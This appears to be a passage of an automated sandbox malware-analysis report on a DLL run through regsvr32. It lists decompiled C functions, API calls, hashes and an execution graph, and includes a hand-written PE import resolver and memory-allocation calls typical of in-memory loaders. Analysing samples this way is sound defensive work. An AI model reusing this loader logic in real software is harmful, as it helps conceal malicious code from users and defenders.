                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                                                            • String ID: %s.dll
                                                                                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                                                                                            • Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                                                                                            • Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                                                                                            • Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				signed int* _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                            				intOrPtr _t133;
                                                                                                                                                                            				intOrPtr _t138;
                                                                                                                                                                            				void* _t202;
                                                                                                                                                                            				void* _t203;
                                                                                                                                                                            
                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                            				_v16 = 1;
                                                                                                                                                                            				_v12 =  *_a4 + 0x80;
                                                                                                                                                                            				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                                            					_v8 = _v20 +  *_v12;
                                                                                                                                                                            					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                            						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            						_t203 = _t202 + 8;
                                                                                                                                                                            						_v36 = _t114;
                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                            							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
                                                                                                                                                                            							_t202 = _t203 + 8;
                                                                                                                                                                            							_v28 = _t116;
                                                                                                                                                                            							if(_v28 != 0) {
                                                                                                                                                                            								 *((intOrPtr*)(_a4 + 8)) = _v28;
                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
                                                                                                                                                                            								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
                                                                                                                                                                            								if( *_v8 == 0) {
                                                                                                                                                                            									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_v32 = _v20 +  *_v8;
                                                                                                                                                                            									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            								}
                                                                                                                                                                            								while( *_v32 != 0) {
                                                                                                                                                                            									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                                            										_v40 = _v20 +  *_v32;
                                                                                                                                                                            										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            										_t202 = _t202 + 0xc;
                                                                                                                                                                            										 *_v24 = _t133;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            										_t202 = _t202 + 0xc;
                                                                                                                                                                            										 *_v24 = _t138;
                                                                                                                                                                            									}
                                                                                                                                                                            									if( *_v24 != 0) {
                                                                                                                                                                            										_v32 =  &(_v32[1]);
                                                                                                                                                                            										_v24 = _v24 + 4;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_v16 = 0;
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_v16 != 0) {
                                                                                                                                                                            									_v8 = _v8 + 0x14;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            								SetLastError(0x7f);
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            							SetLastError(0xe);
                                                                                                                                                                            							_v16 = 0;
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						SetLastError(0x7e);
                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					return _v16;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x10002676
                                                                                                                                                                            0x1000267f
                                                                                                                                                                            0x10002682
                                                                                                                                                                            0x10002693
                                                                                                                                                                            0x1000269d
                                                                                                                                                                            0x100026b1
                                                                                                                                                                            0x100026bf
                                                                                                                                                                            0x100026f7
                                                                                                                                                                            0x100026f9
                                                                                                                                                                            0x100026fc
                                                                                                                                                                            0x10002703
                                                                                                                                                                            0x1000272e
                                                                                                                                                                            0x10002733
                                                                                                                                                                            0x10002736
                                                                                                                                                                            0x1000273d
                                                                                                                                                                            0x1000276f
                                                                                                                                                                            0x10002781
                                                                                                                                                                            0x10002790
                                                                                                                                                                            0x10002799
                                                                                                                                                                            0x100027bd
                                                                                                                                                                            0x100027c9
                                                                                                                                                                            0x1000279b
                                                                                                                                                                            0x100027a3
                                                                                                                                                                            0x100027af
                                                                                                                                                                            0x100027af
                                                                                                                                                                            0x100027e0
                                                                                                                                                                            0x100027f3
                                                                                                                                                                            0x10002825
                                                                                                                                                                            0x10002840
                                                                                                                                                                            0x10002842
                                                                                                                                                                            0x10002848
                                                                                                                                                                            0x100027f5
                                                                                                                                                                            0x10002811
                                                                                                                                                                            0x10002813
                                                                                                                                                                            0x10002819
                                                                                                                                                                            0x10002819
                                                                                                                                                                            0x10002850
                                                                                                                                                                            0x100027d4
                                                                                                                                                                            0x100027dd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002852
                                                                                                                                                                            0x10002852
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002852
                                                                                                                                                                            0x10002850
                                                                                                                                                                            0x10002864
                                                                                                                                                                            0x100026bc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100026bc
                                                                                                                                                                            0x10002877
                                                                                                                                                                            0x1000287e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000287e
                                                                                                                                                                            0x10002750
                                                                                                                                                                            0x10002757
                                                                                                                                                                            0x1000275d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000275d
                                                                                                                                                                            0x10002707
                                                                                                                                                                            0x1000270d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000270d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000288b
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
                                                                                                                                                                            • SetLastError.KERNEL32(0000007E), ref: 10002707
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4100373531-0
                                                                                                                                                                            • Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                                                                                            • Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
                                                                                                                                                                            • Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t4;
                                                                                                                                                                            				void* _t7;
                                                                                                                                                                            				void* _t10;
                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				intOrPtr* _t15;
                                                                                                                                                                            				void* _t17;
                                                                                                                                                                            
                                                                                                                                                                            				_t17 = __ebp;
                                                                                                                                                                            				_t14 = __esi;
                                                                                                                                                                            				_t7 = __ebx;
                                                                                                                                                                            				_t11 = _a4;
                                                                                                                                                                            				_t20 = _t11 - 0x11;
                                                                                                                                                                            				if(_t11 >= 0x11) {
                                                                                                                                                                            					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *0x1005aac0 == 0) {
                                                                                                                                                                            					_t4 = E100142F7();
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t7);
                                                                                                                                                                            				_push(_t17);
                                                                                                                                                                            				_push(_t14);
                                                                                                                                                                            				_t15 = 0x1005ac78 + _t11 * 4;
                                                                                                                                                                            				if( *_t15 == 0) {
                                                                                                                                                                            					EnterCriticalSection(0x1005ac60);
                                                                                                                                                                            					if( *_t15 == 0) {
                                                                                                                                                                            						_t4 = 0x1005aac8 + _t11 * 0x18;
                                                                                                                                                                            						InitializeCriticalSection(_t4);
                                                                                                                                                                            						 *_t15 =  *_t15 + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					LeaveCriticalSection(0x1005ac60);
                                                                                                                                                                            				}
                                                                                                                                                                            				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
                                                                                                                                                                            				return _t4;
                                                                                                                                                                            			}











                                                                                                                                                                            0x1001431b
                                                                                                                                                                            0x1001431b
                                                                                                                                                                            0x1001431b
                                                                                                                                                                            0x1001431c
                                                                                                                                                                            0x10014320
                                                                                                                                                                            0x10014323
                                                                                                                                                                            0x10014325
                                                                                                                                                                            0x10014325
                                                                                                                                                                            0x10014331
                                                                                                                                                                            0x10014333
                                                                                                                                                                            0x10014333
                                                                                                                                                                            0x10014338
                                                                                                                                                                            0x1001433f
                                                                                                                                                                            0x10014340
                                                                                                                                                                            0x10014341
                                                                                                                                                                            0x10014350
                                                                                                                                                                            0x10014357
                                                                                                                                                                            0x1001435c
                                                                                                                                                                            0x10014363
                                                                                                                                                                            0x10014366
                                                                                                                                                                            0x1001436c
                                                                                                                                                                            0x1001436c
                                                                                                                                                                            0x10014373
                                                                                                                                                                            0x10014373
                                                                                                                                                                            0x1001437f
                                                                                                                                                                            0x10014385

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2895727460-0
                                                                                                                                                                            • Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                                                                                            • Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
                                                                                                                                                                            • Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                                                                                            • Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1001398E(long* __ecx, signed int _a4) {
                                                                                                                                                                            				void* _t9;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t12;
                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                            				long* _t16;
                                                                                                                                                                            
                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                            				_t1 =  &(_t16[7]); // 0x1005aaa8
                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                            				EnterCriticalSection(_t12);
                                                                                                                                                                            				_t14 = _a4;
                                                                                                                                                                            				if(_t14 <= 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					LeaveCriticalSection(_t12);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t3 =  &(_t16[3]); // 0x3
                                                                                                                                                                            				if(_t14 >=  *_t3) {
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t9 = TlsGetValue( *_t16);
                                                                                                                                                                            				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					LeaveCriticalSection(_t12);
                                                                                                                                                                            					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x10013990
                                                                                                                                                                            0x10013993
                                                                                                                                                                            0x10013993
                                                                                                                                                                            0x10013997
                                                                                                                                                                            0x1001399d
                                                                                                                                                                            0x100139a3
                                                                                                                                                                            0x100139cc
                                                                                                                                                                            0x100139cd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139d3
                                                                                                                                                                            0x100139a5
                                                                                                                                                                            0x100139a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139ac
                                                                                                                                                                            0x100139b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139bb
                                                                                                                                                                            0x100139c2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139c8

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
                                                                                                                                                                            • TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3969253408-0
                                                                                                                                                                            • Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                                                                                            • Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                                                                                            • Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:5.4%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:13.6%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:354
                                                                                                                                                                            Total number of Limit Nodes:25

                                                                                                                                                                            Graph

                                                                                                                                                                            execution_graph 21507 10017b85 21508 10017b91 21507->21508 21509 10017b8c 21507->21509 21513 10017a8f 21508->21513 21525 1001f914 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21509->21525 21512 10017ba2 21515 10017a9b _realloc 21513->21515 21514 10017ae8 21516 10017b38 _realloc 21514->21516 21581 100088e0 21514->21581 21515->21514 21515->21516 21526 100178b6 21515->21526 21516->21512 21520 100088e0 ___DllMainCRTStartup 142 API calls 21522 10017b0f 21520->21522 21521 100178b6 __CRT_INIT@12 162 API calls 21521->21516 21523 100178b6 __CRT_INIT@12 162 API calls 21522->21523 21524 10017b18 21523->21524 21524->21516 21524->21521 21525->21508 21527 100179e0 21526->21527 21528 100178c9 GetProcessHeap HeapAlloc 21526->21528 21529 100179e6 21527->21529 21530 10017a1b 21527->21530 21531 100178ed GetVersionExA 21528->21531 21558 100178e6 21528->21558 21542 10017a05 21529->21542 21529->21558 21694 10018033 66 API calls _doexit 21529->21694 21534 10017a20 21530->21534 21535 10017a79 21530->21535 21532 10017908 GetProcessHeap HeapFree 21531->21532 21533 100178fd GetProcessHeap HeapFree 21531->21533 21536 10017934 21532->21536 21533->21558 21697 1001bddb 6 API calls __decode_pointer 21534->21697 21535->21558 21719 1001c0b2 78 API calls 2 library calls 21535->21719 21601 1001a305 HeapCreate 21536->21601 21538 10017a25 21698 1001e76e 21538->21698 21542->21558 21695 1001f295 67 API calls __ioterm 21542->21695 21544 1001796a 21544->21558 21611 1001c11b GetModuleHandleA 21544->21611 21547 10017a0f 21696 1001be05 5 API calls __decode_pointer 21547->21696 21548 10017a3d 21704 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21548->21704 21552 10017978 __RTC_Initialize 21555 1001797c 21552->21555 21559 1001798b GetCommandLineA 21552->21559 21554 10017a4f 21560 10017a56 21554->21560 21561 10017a6d 21554->21561 21688 1001a35f VirtualFree HeapFree HeapFree HeapDestroy 21555->21688 21558->21514 21644 1001f60d 21559->21644 21705 1001be42 66 API calls 4 library calls 21560->21705 21706 10016380 21561->21706 21566 10017a5d GetCurrentThreadId 21566->21558 21567 100179ce 21567->21558 21569 100179a5 21570 100179b0 21569->21570 21571 100179a9 21569->21571 21690 1001f554 110 API calls 3 library calls 21570->21690 21689 1001be05 5 API calls __decode_pointer 21571->21689 21574 100179b5 21575 100179c9 21574->21575 21691 1001f2e1 109 API calls 6 library calls 21574->21691 21575->21567 21693 1001f295 67 API calls __ioterm 21575->21693 21578 100179de 21578->21571 21579 100179be 21579->21575 21692 10017ec2 74 API calls 4 library calls 21579->21692 21765 10008860 21581->21765 21584 10008966 21795 1001771b 104 API calls 8 library calls 21584->21795 21586 10008970 21586->21520 21586->21524 21587 10008932 ___DllMainCRTStartup 21588 10008a36 ___DllMainCRTStartup 21587->21588 21589 10008a00 ___DllMainCRTStartup 21587->21589 21591 10008a4e VirtualAlloc 21588->21591 21590 10008a1a VirtualAllocExNuma 21589->21590 21592 10008a66 21590->21592 21591->21592 21593 10016a10 _realloc __VEC_memcpy 21592->21593 21594 10008a78 21593->21594 21770 1001703b 21594->21770 21596 10008a87 21789 10002fa0 21596->21789 21598 10008a9d ___DllMainCRTStartup 21792 10002d20 21598->21792 21602 1001a325 21601->21602 21603 1001a328 21601->21603 21602->21544 21720 1001a2aa 66 API calls 2 library calls 21603->21720 21605 1001a32d 21606 1001a337 21605->21606 21607 1001a35b 21605->21607 21721 1001a57a HeapAlloc 21606->21721 21607->21544 21609 1001a341 21609->21607 21610 1001a346 HeapDestroy 21609->21610 21610->21602 21612 1001c136 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21611->21612 21613 1001c12d 21611->21613 21614 1001c180 TlsAlloc 21612->21614 21722 1001be05 5 API calls __decode_pointer 21613->21722 21618 1001c29a 21614->21618 21619 1001c1ce TlsSetValue 21614->21619 21618->21552 21619->21618 21620 1001c1df 21619->21620 21723 10018042 4 API calls 3 library calls 21620->21723 21622 1001c1e4 21724 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21622->21724 21624 1001c1ef 21725 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21624->21725 21626 1001c1ff 21726 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21626->21726 21628 1001c20f 21727 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21628->21727 21630 1001c21f 21728 1001a3d3 66 API calls ___crtInitCritSecAndSpinCount 21630->21728 21632 1001c22c 21633 1001c295 21632->21633 21729 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21632->21729 21732 1001be05 5 API calls __decode_pointer 21633->21732 21636 1001c240 21636->21633 21637 1001e76e __calloc_crt 66 API calls 21636->21637 21638 1001c259 21637->21638 21638->21633 21730 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21638->21730 21640 1001c273 21640->21633 21641 1001c27a 21640->21641 21731 1001be42 66 API calls 4 library calls 21641->21731 21643 1001c282 GetCurrentThreadId 21643->21618 21645 1001f648 21644->21645 21646 1001f629 GetEnvironmentStringsW 21644->21646 21647 1001f631 21645->21647 21649 1001f6e3 21645->21649 21646->21647 21648 1001f63d GetLastError 21646->21648 21651 1001f663 GetEnvironmentStringsW 21647->21651 21652 1001f672 WideCharToMultiByte 21647->21652 21648->21645 21650 1001f6eb GetEnvironmentStrings 21649->21650 21653 1001799b 21649->21653 21650->21653 21654 1001f6fb 21650->21654 21651->21652 21651->21653 21657 1001f6a6 21652->21657 21658 1001f6d8 FreeEnvironmentStringsW 21652->21658 21671 1001f055 21653->21671 21734 1001e72e 66 API calls _malloc 21654->21734 21733 1001e72e 66 API calls _malloc 21657->21733 21658->21653 21661 1001f714 21663 1001f727 21661->21663 21664 1001f71b FreeEnvironmentStringsA 21661->21664 21662 1001f6ac 21662->21658 21665 1001f6b5 WideCharToMultiByte 21662->21665 21735 10016a10 21663->21735 21664->21653 21667 1001f6cf 21665->21667 21668 1001f6c6 21665->21668 21667->21658 21670 10016380 __ioterm 66 API calls 21668->21670 21670->21667 21739 1001984c 21671->21739 21673 1001f061 GetStartupInfoA 21674 1001e76e __calloc_crt 66 API calls 21673->21674 21681 1001f082 21674->21681 21675 1001f28c _realloc 21675->21569 21676 1001f209 GetStdHandle 21682 1001f1d3 21676->21682 21677 1001f26e SetHandleCount 21677->21675 21678 1001e76e __calloc_crt 66 API calls 21678->21681 21679 1001f21b GetFileType 21679->21682 21680 1001f156 21680->21682 21684 1001f18a 21680->21684 21685 1001f17f GetFileType 21680->21685 21681->21675 21681->21678 21681->21680 21681->21682 21682->21676 21682->21677 21682->21679 21686 1001f232 21682->21686 21684->21675 21684->21680 21740 1001febd 66 API calls 5 library calls 21684->21740 21685->21680 21685->21684 21686->21675 21686->21682 21741 1001febd 66 API calls 5 library calls 21686->21741 21688->21558 21690->21574 21691->21579 21692->21575 21693->21578 21694->21542 21695->21547 21697->21538 21701 1001e772 21698->21701 21700 10017a31 21700->21548 21700->21558 21701->21700 21702 1001e792 Sleep 21701->21702 21742 100170fe 21701->21742 21703 1001e7a7 21702->21703 21703->21700 21703->21701 21704->21554 21705->21566 21708 1001638c _realloc 21706->21708 21707 10016405 _realloc 21707->21567 21708->21707 21709 100163cb 21708->21709 21761 1001a549 66 API calls 2 library calls 21708->21761 21709->21707 21710 100163e0 